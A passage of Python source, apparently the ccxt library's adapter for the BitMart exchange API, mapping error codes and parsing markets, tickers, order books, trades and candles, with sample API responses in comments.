ExchangeError, # 400, Cloud account count limit\n '40005': ExchangeError, # 400, Transfer vol precision error\n '40006': PermissionDenied, # 400, Invalid ip error\n '40007': BadRequest, # 400, Parse parameter error\n '40008': InvalidNonce, # 400, Check nonce error\n '40009': BadRequest, # 400, Check ver error\n '40010': BadRequest, # 400, Not found func error\n '40011': BadRequest, # 400, Invalid request\n '40012': ExchangeError, # 500, System error\n '40013': ExchangeError, # 400, Access too often\" CLIENT_TIME_INVALID, \"Please check your system time.\n '40014': BadSymbol, # 400, This contract is offline\n '40015': BadSymbol, # 400, This contract's exchange has been paused\n '40016': InvalidOrder, # 400, This order would trigger user position liquidate\n '40017': InvalidOrder, # 400, It is not possible to open and close simultaneously in the same position\n '40018': InvalidOrder, # 400, Your position is closed\n '40019': ExchangeError, # 400, Your position is in liquidation delegating\n '40020': InvalidOrder, # 400, Your position volume is not enough\n '40021': ExchangeError, # 400, The position is not exsit\n '40022': ExchangeError, # 400, The position is not isolated\n '40023': ExchangeError, # 400, The position would liquidate when sub margin\n '40024': ExchangeError, # 400, The position would be warnning of liquidation when sub margin\n '40025': ExchangeError, # 400, The position’s margin shouldn’t be lower than the base limit\n '40026': ExchangeError, # 400, You cross margin position is in liquidation delegating\n '40027': InsufficientFunds, # 400, You contract account available balance not enough\n '40028': PermissionDenied, # 400, Your plan order's count is more than system maximum limit.\n '40029': InvalidOrder, # 400, The order's leverage is too large.\n '40030': InvalidOrder, # 400, The order's leverage is too small.\n '40031': InvalidOrder, # 400, The deviation between current price and trigger price is too large.\n '40032': InvalidOrder, # 400, The plan order's life cycle is too long.\n '40033': InvalidOrder, # 400, The plan order's life cycle is too short.\n '40034': BadSymbol, # 400, This contract is not found\n },\n 'broad': {},\n },\n 'commonCurrencies': {\n 'COT': 'Community Coin',\n 'CPC': 'CPCoin',\n 'DMS': 'DimSum', # conflict with Dragon Mainland Shards\n 'FOX': 'Fox Finance',\n 'GDT': 'Gorilla Diamond',\n '$HERO': 'Step Hero',\n '$PAC': 'PAC',\n 'MIM': 'MIM Swarm',\n 'MVP': 'MVP Coin',\n 'ONE': 'Menlo One',\n 'PLA': 'Plair',\n 'TCT': 'TacoCat Token',\n 'TRU': 'Truebit', # conflict with TrueFi\n },\n 'options': {\n 'networks': {\n 'TRX': 'TRC20',\n 'ETH': 'ERC20',\n },\n 'defaultNetworks': {\n 'USDT': 'ERC20',\n },\n 'defaultType': 'spot', # 'spot', 'swap'\n 'fetchBalance': {\n 'type': 'spot', # 'spot', 'swap', 'contract', 'account'\n },\n 'createMarketBuyOrderRequiresPrice': True,\n },\n })\n\n def fetch_time(self, params={}):\n response = self.publicSystemGetTime(params)\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"c4e5e5b7-fe9f-4191-89f7-53f6c5bf9030\",\n # \"data\":{\n # \"server_time\":1599843709578\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n return self.safe_integer(data, 'server_time')\n\n def fetch_status(self, params={}):\n options = self.safe_value(self.options, 'fetchBalance', {})\n defaultType = self.safe_string(self.options, 'defaultType')\n type = self.safe_string(options, 'type', defaultType)\n type = self.safe_string(params, 'type', type)\n params = self.omit(params, 'type')\n response = self.publicSystemGetService(params)\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"serivce\":[\n # {\n # \"title\": \"Spot API Stop\",\n # \"service_type\": \"spot\",\n # \"status\": \"2\",\n # \"start_time\": 1527777538000,\n # \"end_time\": 1527777538000\n # },\n # {\n # \"title\": \"Contract API Stop\",\n # \"service_type\": \"contract\",\n # \"status\": \"2\",\n # \"start_time\": 1527777538000,\n # \"end_time\": 1527777538000\n # }\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n services = self.safe_value(data, 'service', [])\n servicesByType = self.index_by(services, 'service_type')\n if (type == 'swap') or (type == 'future'):\n type = 'contract'\n service = self.safe_value(servicesByType, type)\n status = None\n eta = None\n if service is not None:\n statusCode = self.safe_integer(service, 'status')\n if statusCode == 2:\n status = 'ok'\n else:\n status = 'maintenance'\n eta = self.safe_integer(service, 'end_time')\n self.status = self.extend(self.status, {\n 'status': status,\n 'updated': self.milliseconds(),\n 'eta': eta,\n })\n return self.status\n\n def fetch_spot_markets(self, params={}):\n response = self.publicSpotGetSymbolsDetails(params)\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"a67c9146-086d-4d3f-9897-5636a9bb26e1\",\n # \"data\":{\n # \"symbols\":[\n # {\n # \"symbol\":\"PRQ_BTC\",\n # \"symbol_id\":1232,\n # \"base_currency\":\"PRQ\",\n # \"quote_currency\":\"BTC\",\n # \"quote_increment\":\"1.0000000000\",\n # \"base_min_size\":\"1.0000000000\",\n # \"base_max_size\":\"10000000.0000000000\",\n # \"price_min_precision\":8,\n # \"price_max_precision\":10,\n # \"expiration\":\"NA\",\n # \"min_buy_amount\":\"0.0001000000\",\n # \"min_sell_amount\":\"0.0001000000\"\n # },\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n symbols = self.safe_value(data, 'symbols', [])\n result = []\n for i in range(0, len(symbols)):\n market = symbols[i]\n id = self.safe_string(market, 'symbol')\n numericId = self.safe_integer(market, 'symbol_id')\n baseId = self.safe_string(market, 'base_currency')\n quoteId = self.safe_string(market, 'quote_currency')\n base = self.safe_currency_code(baseId)\n quote = self.safe_currency_code(quoteId)\n symbol = base + '/' + quote\n #\n # https://github.com/bitmartexchange/bitmart-official-api-docs/blob/master/rest/public/symbols_details.md#response-details\n # from the above API doc:\n # quote_increment Minimum order price as well as the price increment\n # price_min_precision Minimum price precision(digit) used to query price and kline\n # price_max_precision Maximum price precision(digit) used to query price and kline\n #\n # the docs are wrong: https://github.com/ccxt/ccxt/issues/5612\n #\n pricePrecision = self.safe_integer(market, 'price_max_precision')\n precision = {\n 'amount': self.safe_number(market, 'base_min_size'),\n 'price': self.parse_number(self.decimal_to_precision(math.pow(10, -pricePrecision), ROUND, 14)),\n }\n minBuyCost = self.safe_number(market, 'min_buy_amount')\n minSellCost = self.safe_number(market, 'min_sell_amount')\n minCost = max(minBuyCost, minSellCost)\n limits = {\n 'amount': {\n 'min': self.safe_number(market, 'base_min_size'),\n 'max': self.safe_number(market, 'base_max_size'),\n },\n 'price': {\n 'min': None,\n 'max': None,\n },\n 'cost': {\n 'min': minCost,\n 'max': None,\n },\n }\n result.append({\n 'id': id,\n 'numericId': numericId,\n 'symbol': symbol,\n 'base': base,\n 'quote': quote,\n 'baseId': baseId,\n 'quoteId': quoteId,\n 'type': 'spot',\n 'spot': True,\n 'future': False,\n 'swap': False,\n 'precision': precision,\n 'limits': limits,\n 'info': market,\n 'active': True,\n })\n return result\n\n def fetch_contract_markets(self, params={}):\n response = self.publicContractGetContracts(params)\n #\n # {\n # \"errno\":\"OK\",\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"7fcedfb5-a660-4780-8a7a-b36a9e2159f7\",\n # \"data\":{\n # \"contracts\":[\n # {\n # \"contract\":{\n # \"contract_id\":1,\n # \"index_id\":1,\n # \"name\":\"BTCUSDT\",\n # \"display_name\":\"BTCUSDT永续合约\",\n # \"display_name_en\":\"BTCUSDT_SWAP\",\n # \"contract_type\":1,\n # \"base_coin\":\"BTC\",\n # \"quote_coin\":\"USDT\",\n # \"price_coin\":\"BTC\",\n # \"exchange\":\"*\",\n # \"contract_size\":\"0.0001\",\n # \"begin_at\":\"2018-08-17T04:00:00Z\",\n # \"delive_at\":\"2020-08-15T12:00:00Z\",\n # \"delivery_cycle\":28800,\n # \"min_leverage\":\"1\",\n # \"max_leverage\":\"100\",\n # \"price_unit\":\"0.1\",\n # \"vol_unit\":\"1\",\n # \"value_unit\":\"0.0001\",\n # \"min_vol\":\"1\",\n # \"max_vol\":\"300000\",\n # \"liquidation_warn_ratio\":\"0.85\",\n # \"fast_liquidation_ratio\":\"0.8\",\n # \"settgle_type\":1,\n # \"open_type\":3,\n # \"compensate_type\":1,\n # \"status\":3,\n # \"block\":1,\n # \"rank\":1,\n # \"created_at\":\"2018-07-12T19:16:57Z\",\n # \"depth_bord\":\"1.001\",\n # \"base_coin_zh\":\"比特币\",\n # \"base_coin_en\":\"Bitcoin\",\n # \"max_rate\":\"0.00375\",\n # \"min_rate\":\"-0.00375\"\n # },\n # \"risk_limit\":{\"contract_id\":1,\"base_limit\":\"1000000\",\"step\":\"500000\",\"maintenance_margin\":\"0.005\",\"initial_margin\":\"0.01\"},\n # \"fee_config\":{\"contract_id\":1,\"maker_fee\":\"-0.0003\",\"taker_fee\":\"0.001\",\"settlement_fee\":\"0\",\"created_at\":\"2018-07-12T20:47:22Z\"},\n # \"plan_order_config\":{\"contract_id\":0,\"min_scope\":\"0.001\",\"max_scope\":\"2\",\"max_count\":10,\"min_life_cycle\":24,\"max_life_cycle\":168}\n # },\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n contracts = self.safe_value(data, 'contracts', [])\n result = []\n for i in range(0, len(contracts)):\n market = contracts[i]\n contract = self.safe_value(market, 'contract', {})\n id = self.safe_string(contract, 'contract_id')\n numericId = self.safe_integer(contract, 'contract_id')\n baseId = self.safe_string(contract, 'base_coin')\n quoteId = self.safe_string(contract, 'quote_coin')\n base = self.safe_currency_code(baseId)\n quote = self.safe_currency_code(quoteId)\n symbol = self.safe_string(contract, 'name')\n #\n # https://github.com/bitmartexchange/bitmart-official-api-docs/blob/master/rest/public/symbols_details.md#response-details\n # from the above API doc:\n # quote_increment Minimum order price as well as the price increment\n # price_min_precision Minimum price precision(digit) used to query price and kline\n # price_max_precision Maximum price precision(digit) used to query price and kline\n #\n # the docs are wrong: https://github.com/ccxt/ccxt/issues/5612\n #\n amountPrecision = self.safe_number(contract, 'vol_unit')\n pricePrecision = self.safe_number(contract, 'price_unit')\n precision = {\n 'amount': amountPrecision,\n 'price': pricePrecision,\n }\n limits = {\n 'amount': {\n 'min': self.safe_number(contract, 'min_vol'),\n 'max': self.safe_number(contract, 'max_vol'),\n },\n 'price': {\n 'min': None,\n 'max': None,\n },\n 'cost': {\n 'min': None,\n 'max': None,\n },\n }\n contractType = self.safe_value(contract, 'contract_type')\n future = False\n swap = False\n type = 'contract'\n if contractType == 1:\n type = 'swap'\n swap = True\n elif contractType == 2:\n type = 'future'\n future = True\n feeConfig = self.safe_value(market, 'fee_config', {})\n maker = self.safe_number(feeConfig, 'maker_fee')\n taker = self.safe_number(feeConfig, 'taker_fee')\n result.append({\n 'id': id,\n 'numericId': numericId,\n 'symbol': symbol,\n 'base': base,\n 'quote': quote,\n 'baseId': baseId,\n 'quoteId': quoteId,\n 'maker': maker,\n 'taker': taker,\n 'type': type,\n 'spot': False,\n 'future': future,\n 'swap': swap,\n 'precision': precision,\n 'limits': limits,\n 'info': market,\n 'active': None,\n })\n return result\n\n def fetch_markets(self, params={}):\n return self.fetch_spot_markets()\n\n def fetch_funding_fee(self, code, params={}):\n self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n }\n response = self.privateAccountGetWithdrawCharge(self.extend(request, params))\n #\n # {\n # message: 'OK',\n # code: '1000',\n # trace: '3ecc0adf-91bd-4de7-aca1-886c1122f54f',\n # data: {\n # today_available_withdraw_BTC: '100.0000',\n # min_withdraw: '0.005',\n # withdraw_precision: '8',\n # withdraw_fee: '0.000500000000000000000000000000'\n # }\n # }\n #\n data = response['data']\n withdrawFees = {}\n withdrawFees[code] = self.safe_number(data, 'withdraw_fee')\n return {\n 'info': response,\n 'withdraw': withdrawFees,\n 'deposit': {},\n }\n\n def parse_ticker(self, ticker, market=None):\n #\n # spot\n #\n # {\n # \"symbol\":\"ETH_BTC\",\n # \"last_price\":\"0.036037\",\n # \"quote_volume_24h\":\"4380.6660000000\",\n # \"base_volume_24h\":\"159.3582006712\",\n # \"high_24h\":\"0.036972\",\n # \"low_24h\":\"0.035524\",\n # \"open_24h\":\"0.036561\",\n # \"close_24h\":\"0.036037\",\n # \"best_ask\":\"0.036077\",\n # \"best_ask_size\":\"9.9500\",\n # \"best_bid\":\"0.035983\",\n # \"best_bid_size\":\"4.2792\",\n # \"fluctuation\":\"-0.0143\",\n # \"s_t\": \"1630981727\", # ws only\n # \"url\":\"https://www.bitmart.com/trade?symbol=ETH_BTC\"\n # }\n #\n # contract\n #\n # {\n # contract_symbol: \"DGBUSDT\",\n # last_price: \"0.05759\",\n # index_price: \"0.05757755\",\n # last_funding_rate: \"0.00010000\",\n # price_change_percent_24h: \"0.244\",\n # volume_24h: \"64303817.028126\",\n # url: \"https://futures.bitmart.com/en?symbol=DGBUSDT\"\n # }\n #\n timestamp = self.safe_timestamp_2(ticker, 'timestamp', 's_t', self.milliseconds())\n marketId = self.safe_string_2(ticker, 'symbol', 'contract_id')\n marketId = self.safe_string(ticker, 'contract_symbol', marketId)\n symbol = self.safe_symbol(marketId, market)\n last = self.safe_number_2(ticker, 'close_24h', 'last_price')\n percentage = self.safe_number_2(ticker, 'fluctuation', 'rise_fall_rate')\n if percentage is not None:\n percentage *= 100\n if percentage is None:\n percentage = self.safe_number(ticker, 'price_change_percent_24h')\n baseVolume = self.safe_number_2(ticker, 'base_coin_volume', 'base_volume_24h')\n quoteVolume = self.safe_number_2(ticker, 'quote_coin_volume', 'quote_volume_24h')\n quoteVolume = self.safe_number(ticker, 'volume_24h', quoteVolume)\n open = self.safe_number_2(ticker, 'open_24h', 'open')\n average = None\n if (last is not None) and (open is not None):\n average = self.sum(last, open) / 2\n average = self.safe_number(ticker, 'avg_price', average)\n price = self.safe_value(ticker, 'depth_price', ticker)\n return {\n 'symbol': symbol,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'high': self.safe_number_2(ticker, 'high', 'high_24h'),\n 'low': self.safe_number_2(ticker, 'low', 'low_24h'),\n 'bid': self.safe_number_2(price, 'best_bid', 'bid_price'),\n 'bidVolume': self.safe_number(ticker, 'best_bid_size'),\n 'ask': self.safe_number_2(price, 'best_ask', 'ask_price'),\n 'askVolume': self.safe_number(ticker, 'best_ask_size'),\n 'vwap': None,\n 'open': self.safe_number(ticker, 'open_24h'),\n 'close': last,\n 'last': last,\n 'previousClose': None,\n 'change': None,\n 'percentage': percentage,\n 'average': average,\n 'baseVolume': baseVolume,\n 'quoteVolume': quoteVolume,\n 'info': ticker,\n }\n\n def fetch_ticker(self, symbol, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {}\n method = None\n if market['swap'] or market['future']:\n method = 'publicContractGetTickers'\n request['contractID'] = market['id']\n elif market['spot']:\n method = 'publicSpotGetTicker'\n request['symbol'] = market['id']\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"6aa5b923-2f57-46e3-876d-feca190e0b82\",\n # \"data\":{\n # \"tickers\":[\n # {\n # \"symbol\":\"ETH_BTC\",\n # \"last_price\":\"0.036037\",\n # \"quote_volume_24h\":\"4380.6660000000\",\n # \"base_volume_24h\":\"159.3582006712\",\n # \"high_24h\":\"0.036972\",\n # \"low_24h\":\"0.035524\",\n # \"open_24h\":\"0.036561\",\n # \"close_24h\":\"0.036037\",\n # \"best_ask\":\"0.036077\",\n # \"best_ask_size\":\"9.9500\",\n # \"best_bid\":\"0.035983\",\n # \"best_bid_size\":\"4.2792\",\n # \"fluctuation\":\"-0.0143\",\n # \"url\":\"https://www.bitmart.com/trade?symbol=ETH_BTC\"\n # }\n # ]\n # }\n # }\n #\n # contract\n #\n # {\n # message: \"OK\",\n # code: \"1000\",\n # trace: \"84a0dc44-b395-4bae-a1b7-fe1201defd51\",\n # data: {\n # tickers: [\n # {\n # contract_symbol: \"DGBUSDT\",\n # last_price: \"0.05759\",\n # index_price: \"0.05757755\",\n # last_funding_rate: \"0.00010000\",\n # price_change_percent_24h: \"0.244\",\n # volume_24h: \"64303817.028126\",\n # url: \"https://futures.bitmart.com/en?symbol=DGBUSDT\"\n # },\n # ],\n # },\n # }\n #\n data = self.safe_value(response, 'data', {})\n tickers = self.safe_value(data, 'tickers', [])\n tickersById = self.index_by(tickers, 'symbol')\n ticker = self.safe_value(tickersById, market['id'])\n return self.parse_ticker(ticker, market)\n\n def fetch_tickers(self, symbols=None, params={}):\n self.load_markets()\n defaultType = self.safe_string(self.options, 'defaultType', 'spot')\n type = self.safe_string(params, 'type', defaultType)\n params = self.omit(params, 'type')\n method = None\n if (type == 'swap') or (type == 'future'):\n method = 'publicContractGetTickers'\n elif type == 'spot':\n method = 'publicSpotGetTicker'\n response = getattr(self, method)(params)\n data = self.safe_value(response, 'data', {})\n tickers = self.safe_value(data, 'tickers', [])\n result = {}\n for i in range(0, len(tickers)):\n ticker = self.parse_ticker(tickers[i])\n symbol = ticker['symbol']\n result[symbol] = ticker\n return self.filter_by_array(result, 'symbol', symbols)\n\n def fetch_currencies(self, params={}):\n response = self.publicAccountGetCurrencies(params)\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"8c768b3c-025f-413f-bec5-6d6411d46883\",\n # \"data\":{\n # \"currencies\":[\n # {\"currency\":\"MATIC\",\"name\":\"Matic Network\",\"withdraw_enabled\":true,\"deposit_enabled\":true},\n # {\"currency\":\"KTN\",\"name\":\"Kasoutuuka News\",\"withdraw_enabled\":true,\"deposit_enabled\":false},\n # {\"currency\":\"BRT\",\"name\":\"Berith\",\"withdraw_enabled\":true,\"deposit_enabled\":true},\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n currencies = self.safe_value(data, 'currencies', [])\n result = {}\n for i in range(0, len(currencies)):\n currency = currencies[i]\n id = self.safe_string(currency, 'currency')\n code = self.safe_currency_code(id)\n name = self.safe_string(currency, 'name')\n withdrawEnabled = self.safe_value(currency, 'withdraw_enabled')\n depositEnabled = self.safe_value(currency, 'deposit_enabled')\n active = withdrawEnabled and depositEnabled\n result[code] = {\n 'id': id,\n 'code': code,\n 'name': name,\n 'info': currency, # the original payload\n 'active': active,\n 'fee': None,\n 'precision': None,\n 'limits': {\n 'amount': {'min': None, 'max': None},\n 'withdraw': {'min': None, 'max': None},\n },\n }\n return result\n\n def fetch_order_book(self, symbol, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {}\n method = None\n if market['spot']:\n method = 'publicSpotGetSymbolsBook'\n request['symbol'] = market['id']\n if limit is not None:\n request['size'] = limit # default 50, max 200\n # request['precision'] = 4 # optional price precision / depth level whose range is defined in symbol details\n elif market['swap'] or market['future']:\n method = 'publicContractGetDepth'\n request['contractID'] = market['id']\n if limit is not None:\n request['count'] = limit # returns all records if size is omitted\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"8254f8fc-431d-404f-ad9a-e716339f66c7\",\n # \"data\":{\n # \"buys\":[\n # {\"amount\":\"4.7091\",\"total\":\"4.71\",\"price\":\"0.034047\",\"count\":\"1\"},\n # {\"amount\":\"5.7439\",\"total\":\"10.45\",\"price\":\"0.034039\",\"count\":\"1\"},\n # {\"amount\":\"2.5249\",\"total\":\"12.98\",\"price\":\"0.032937\",\"count\":\"1\"},\n # ],\n # \"sells\":[\n # {\"amount\":\"41.4365\",\"total\":\"41.44\",\"price\":\"0.034174\",\"count\":\"1\"},\n # {\"amount\":\"4.2317\",\"total\":\"45.67\",\"price\":\"0.034183\",\"count\":\"1\"},\n # {\"amount\":\"0.3000\",\"total\":\"45.97\",\"price\":\"0.034240\",\"count\":\"1\"},\n # ]\n # }\n # }\n #\n # contract\n #\n # {\n # \"errno\":\"OK\",\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"c330dfca-ca5b-4f15-b350-9fef3f049b4f\",\n # \"data\":{\n # \"sells\":[\n # {\"price\":\"347.6\",\"vol\":\"6678\"},\n # {\"price\":\"347.7\",\"vol\":\"3452\"},\n # {\"price\":\"347.8\",\"vol\":\"6331\"},\n # ],\n # \"buys\":[\n # {\"price\":\"347.5\",\"vol\":\"6222\"},\n # {\"price\":\"347.4\",\"vol\":\"20979\"},\n # {\"price\":\"347.3\",\"vol\":\"15179\"},\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n if market['spot']:\n return self.parse_order_book(data, symbol, None, 'buys', 'sells', 'price', 'amount')\n elif market['swap'] or market['future']:\n return self.parse_order_book(data, symbol, None, 'buys', 'sells', 'price', 'vol')\n\n def parse_trade(self, trade, market=None):\n #\n # public fetchTrades spot( amount = count * price )\n #\n # {\n # \"amount\": \"818.94\",\n # \"order_time\": \"1637601839035\", # ETH/USDT\n # \"price\": \"4221.99\",\n # \"count\": \"0.19397\",\n # \"type\": \"buy\"\n # }\n #\n # public fetchTrades contract, private fetchMyTrades contract\n #\n # {\n # \"order_id\":109159616160,\n # \"trade_id\":109159616197,\n # \"contract_id\":2,\n # \"deal_price\":\"347.6\",\n # \"deal_vol\":\"5623\",\n # \"make_fee\":\"-5.8636644\",\n # \"take_fee\":\"9.772774\",\n # \"created_at\":\"2020-09-09T11:49:50.749170536Z\",\n # \"way\":1,\n # \"fluctuation\":\"0\"\n # }\n #\n # private fetchMyTrades spot\n #\n # {\n # \"detail_id\":256348632,\n # \"order_id\":2147484350,\n # \"symbol\":\"BTC_USDT\",\n # \"create_time\":1590462303000,\n # \"side\":\"buy\",\n # \"fees\":\"0.00001350\",\n # \"fee_coin_name\":\"BTC\",\n # \"notional\":\"88.00000000\",\n # \"price_avg\":\"8800.00\",\n # \"size\":\"0.01000\",\n # \"exec_type\":\"M\"\n # }\n #\n id = self.safe_string_2(trade, 'trade_id', 'detail_id')\n timestamp = self.safe_integer_2(trade, 'order_time', 'create_time')\n if timestamp is None:\n timestamp = self.safe_timestamp(trade, 's_t')\n if timestamp is None:\n timestamp = self.parse8601(self.safe_string(trade, 'created_at'))\n type = None\n way = self.safe_integer(trade, 'way')\n side = self.safe_string_lower_2(trade, 'type', 'side')\n if (side is None) and (way is not None):\n if way < 5:\n side = 'buy'\n else:\n side = 'sell'\n takerOrMaker = None\n execType = self.safe_string(trade, 'exec_type')\n if execType is not None:\n takerOrMaker = 'maker' if (execType == 'M') else 'taker'\n priceString = self.safe_string_2(trade, 'price', 'deal_price')\n priceString = self.safe_string(trade, 'price_avg', priceString)\n amountString = self.safe_string_2(trade, 'count', 'deal_vol')\n amountString = self.safe_string(trade, 'size', amountString)\n costString = self.safe_string_2(trade, 'amount', 'notional')\n orderId = self.safe_integer(trade, 'order_id')\n marketId = self.safe_string_2(trade, 'contract_id', 'symbol')\n symbol = self.safe_symbol(marketId, market, '_')\n feeCostString = self.safe_string(trade, 'fees')\n fee = None\n if feeCostString is not None:\n feeCurrencyId = self.safe_string(trade, 'fee_coin_name')\n feeCurrencyCode = self.safe_currency_code(feeCurrencyId)\n if (feeCurrencyCode is None) and (market is not None):\n feeCurrencyCode = market['base'] if (side == 'buy') else market['quote']\n fee = {\n 'cost': feeCostString,\n 'currency': feeCurrencyCode,\n }\n return self.safe_trade({\n 'info': trade,\n 'id': id,\n 'order': orderId,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'symbol': symbol,\n 'type': type,\n 'side': side,\n 'price': priceString,\n 'amount': amountString,\n 'cost': costString,\n 'takerOrMaker': takerOrMaker,\n 'fee': fee,\n }, market)\n\n def fetch_trades(self, symbol, since=None, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {\n 'symbol': market['id'],\n }\n method = None\n if market['spot']:\n request['symbol'] = market['id']\n method = 'publicSpotGetSymbolsTrades'\n elif market['swap'] or market['future']:\n method = 'publicContractGetTrades'\n request['contractID'] = market['id']\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"222d74c0-8f6d-49d9-8e1b-98118c50eeba\",\n # \"data\":{\n # \"trades\":[\n # {\n # \"amount\":\"0.005703\",\n # \"order_time\":1599652045394,\n # \"price\":\"0.034029\",\n # \"count\":\"0.1676\",\n # \"type\":\"sell\"\n # },\n # ]\n # }\n # }\n #\n # contract\n #\n # {\n # \"errno\":\"OK\",\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"782bc746-b86e-43bf-8d1a-c68b479c9bdd\",\n # \"data\":{\n # \"trades\":[\n # {\n # \"order_id\":109159616160,\n # \"trade_id\":109159616197,\n # \"contract_id\":2,\n # \"deal_price\":\"347.6\",\n # \"deal_vol\":\"5623\",\n # \"make_fee\":\"-5.8636644\",\n # \"take_fee\":\"9.772774\",\n # \"created_at\":\"2020-09-09T11:49:50.749170536Z\",\n # \"way\":1,\n # \"fluctuation\":\"0\"\n # }\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n trades = self.safe_value(data, 'trades', [])\n return self.parse_trades(trades, market, since, limit)\n\n def parse_ohlcv(self, ohlcv, market=None):\n #\n # spot\n #\n # {\n # \"last_price\":\"0.034987\",\n # \"timestamp\":1598787420,\n # \"volume\":\"1.0198\",\n # \"open\":\"0.035007\",\n # \"close\":\"0.034987\",\n # \"high\":\"0.035007\",\n # \"low\":\"0.034986\"\n # }\n #\n # contract\n #\n # {\n # \"low\":\"404.4\",\n # \"high\":\"404.4\",\n # \"open\":\"404.4\",\n # \"close\":\"404.4\",\n # \"last_price\":\"404.4\",\n # \"avg_price\":\"404.4\",\n # \"volume\":\"7670\",\n # \"timestamp\":1598758441,\n # \"rise_fall_rate\":\"0\",\n # \"rise_fall_value\":\"0\",\n # \"base_coin_volume\":\"76.7\",\n # \"quote_coin_volume\":\"31017.48\"\n # }\n #\n # ws\n #\n # [\n # 1631056350, # timestamp\n # '46532.83', # oopen\n # '46555.71', # high\n # '46511.41', # low\n # '46555.71', # close\n # '0.25', # volume\n # ]\n #\n if isinstance(ohlcv, list):\n return [\n self.safe_timestamp(ohlcv, 0),\n self.safe_number(ohlcv, 1),\n self.safe_number(ohlcv, 2),\n self.safe_number(ohlcv, 3),\n self.safe_number(ohlcv, 4),\n self.safe_number(ohlcv, 5),\n ]\n else:\n return [\n self.safe_timestamp(ohlcv, 'timestamp'),\n self.safe_number(ohlcv, 'open'),\n self.safe_number(ohlcv, 'high'),\n self.safe_number(ohlcv, 'low'),\n self.safe_number(ohlcv, 'close'),\n self.safe_number(ohlcv, 'volume'),\n ]\n\n def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n type = market['type']\n method = None\n request = {}\n duration = self.parse_timeframe(timeframe)\n if type == 'spot':\n method = 'publicSpotGetSymbolsKline'\n request['symbol'] = market['id']\n request['step'] = self.timeframes[timeframe]\n # the exchange will return an empty array if more than 500 candles is requested\n maxLimit = 500\n if limit is None:\n limit = maxLimit\n limit = min(maxLimit, limit)\n if since is None:\n end = int(self.milliseconds() / 1000)\n start = end - limit * duration\n request['from'] = start\n request['to'] = end\n else:\n start = int(since / 1000)\n end = self.sum(start, limit * duration)\n request['from'] = start\n request['to'] = end\n elif (type == 'swap') or (type == 'future'):\n method = 'publicContractGetQuote'\n request['contractID'] = market['id']\n defaultLimit = 500\n if limit is None:\n limit = defaultLimit\n if since is None:\n end = int(self.milliseconds() / 1000)\n start = end - limit * duration\n request['startTime'] = start\n request['endTime'] = end\n else:\n start = int(since / 1000)\n end = self.sum(start, limit * duration)\n request['startTime'] = start\n request['endTime'] = end\n request['unit'] = self.timeframes[timeframe]\n request['resolution'] = 'M'\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"80d86378-ab4e-4c70-819e-b42146cf87ad\",\n # \"data\":{\n # \"klines\":[\n # {\"last_price\":\"0.034987\",\"timestamp\":1598787420,\"volume\":\"1.0198\",\"open\":\"0.035007\",\"close\":\"0.034987\",\"high\":\"0.035007\",\"low\":\"0.034986\"},\n # {\"last_price\":\"0.034986\",\"timestamp\":1598787480,\"volume\":\"0.3959\",\"open\":\"0.034982\",\"close\":\"0.034986\",\"high\":\"0.034986\",\"low\":\"0.034980\"},\n # {\"last_price\":\"0.034978\",\"timestamp\":1598787540,\"volume\":\"0.3259\",\"open\":\"0.034987\",\"close\":\"0.034978\",\"high\":\"0.034987\",\"low\":\"0.034977\"},\n # ]\n # }\n # }\n #\n # swap\n #\n # {\n # \"errno\":\"OK\",\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"32965074-5804-4655-b693-e953e36026a0\",\n # \"data\":[\n # {\"low\":\"404.4\",\"high\":\"404.4\",\"open\":\"404.4\",\"close\":\"404.4\",\"last_price\":\"404.4\",\"avg_price\":\"404.4\",\"volume\":\"7670\",\"timestamp\":1598758441,\"rise_fall_rate\":\"0\",\"rise_fall_value\":\"0\",\"base_coin_volume\":\"76.7\",\"quote_coin_volume\":\"31017.48\"},\n # {\"low\":\"404.1\",\"high\":\"404.4\",\"open\":\"404.4\",\"close\":\"404.1\",\"last_price\":\"404.1\",\"avg_price\":\"404.15881086\",\"volume\":\"12076\",\"timestamp\":1598758501,\"rise_fall_rate\":\"-0.000741839762611276\",\"rise_fall_value\":\"-0.3\",\"base_coin_volume\":\"120.76\",\"quote_coin_volume\":\"48806.2179994536\"},\n # 